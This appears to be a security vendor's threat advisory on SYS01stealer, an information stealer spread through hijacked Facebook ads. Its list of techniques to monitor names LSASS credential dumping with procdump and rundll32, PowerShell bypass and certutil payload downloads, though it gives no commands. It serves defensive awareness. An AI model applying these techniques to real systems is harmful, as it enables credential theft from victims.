Flash Notice: Stealer Malware Spread Through HiJacked Facebook Advertisements

overview

Independent cybersecurity researchers have recently uncovered an ongoing malware campaign abusing Meta’s advertising platform to distribute an information stealer known as SYS01stealer. 

SYS01stealer was first documented in in 2023 by Morphisec, when it was observed targeting Facebook business accounts through fake profiles and misused Google advertisements.  

Unlike ransomware, SYS01stealer’s goal is to steal login credentials, browsing history, and cookies to either set conditions for a more damaging attack in the future, or to sell directly via dark-web forums. 

 The threat actors behind these campaigns will often impersonate or try to hijack legitimate brands in order to propagate their malware, any one who advertises via LinkedIn, Facebook, or other Meta owned company is advised to review their marketing materials to ensure no one’s impersonating them for malicious purposes.  

how avertium is protecting our customers

IOCs ADDED TO OUR THREAT FEEDS

NOTE!: Avertium is actively searching across all monitored environments for the IoC’s listed below. If any are discovered, we will reach out to you directly. If your environment or portions of your environment are not currently being monitored, please reach out to your Service Delivery Manager. 

TTPs TO MONITOR

1. T1003 - Credential Dumping: SYS01stealer often attempts to steal credentials from memory, databases, or other storage. This includes dumping credentials from processes like LSASS (Local Security Authority Subsystem Service), which contains user authentication information. Attackers may use tools like rundll32 and procdump to facilitate this. 
2. T1059.001 - PowerShell: SYS01stealer leverages PowerShell scripts to execute various commands, including credential theft activities. These scripts may use bypass techniques to avoid detection by security software​. Microsoft Sentinel 101 
3. T1071.001 - Application Layer Protocol: Web Protocols: SYS01stealer communicates with command-and-control (C2) servers to exfiltrate credentials. This is often done over common web protocols, such as HTTP or HTTPS, to avoid detection by blending in with normal web traffic​. Microsoft Sentinel 101 
4. T1140 - Deobfuscate/Decode Files or Information: To evade detection, SYS01stealer may obfuscate parts of its payload or encode the data it exfiltrates. The malware then decodes it before or during execution, a common technique used to hide malicious code​. SentinelOne 
   
5. T1105 - Ingress Tool Transfer: Attackers often use certutil.exe to download additional malicious payloads, including credential theft tools, from a remote server. This is a common pattern observed in campaigns using SYS01stealer​. Microsoft Sentinel 101 
6. T1547 - Boot or Logon Autostart Execution: To maintain persistence, SYS01stealer may create scheduled tasks or modify registry keys that allow it to execute during system startup, ensuring it has ongoing access to steal credentials​. Microsoft Sentinel 101, Microsoft Sentinel 101 

additional recommendations

The most common vector of compromise for this kind of attack is “Drive-by Compromise” which involves luring a victim to the attacker controlled website and tricking them into downloading the malicious files. Educating users is one of the most effective defenses against this technique. Training employees to verify the URL, avoid clicking on unknown links, and report suspicious messages can significantly reduce the chances of falling victim to this. 

ADDITIONAL SERVICE OFFERINGS

• Fusion MXDR  is the first MDR offering that fuse together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts.
  
• Security Information and Event Management (SIEM) - Minimizing the impact of a successful ransomware or malware attack requires detecting it as early in the attack as possible. A Security Information and Event Management (SIEM) system can help an organization to accomplish this. Avertium offers a comprehensive SIEM-based approach that increases the potential for detecting a ransomware infection before it deploys. SIEM provides a holistic overview of a company’s IT environment from a single point of view in terms of its specific security events, empowering teams to detect and analyze unusual behavior. 
• Avertium aligns your Cybersecurity Strategy with your business strategy, ensuring that your investment in security is also an investment in your business. Our Cybersecurity Strategy service includes:  
  • Strategic Security Assessments - Strengthening your security posture begins with knowing where your current program stands (NIST CSF, Security Architecture, Business Impact Analysis, Sensitive Data Inventory, Network Virtualization and Cloud Assessment). 
  • Threat Mapping – Leverage Avertium’s Cyber Threat Intelligence, getting a more informed view of your most likely attack scenarios (Threat Assessment and MITRE ATT&CK). 
  • Cyber Maturity Roadmap - Embrace a comprehensive, quantifiable, and well-organized approach to establishing and continuously enhancing your cybersecurity resilience (Policy + Procedure Development, Virtual CISO (VCISO), Training + Enablement, Tabletop Exercises, and Business Continuity + Disaster Recovery Plan).

SUPPORTING DOCUMENTATION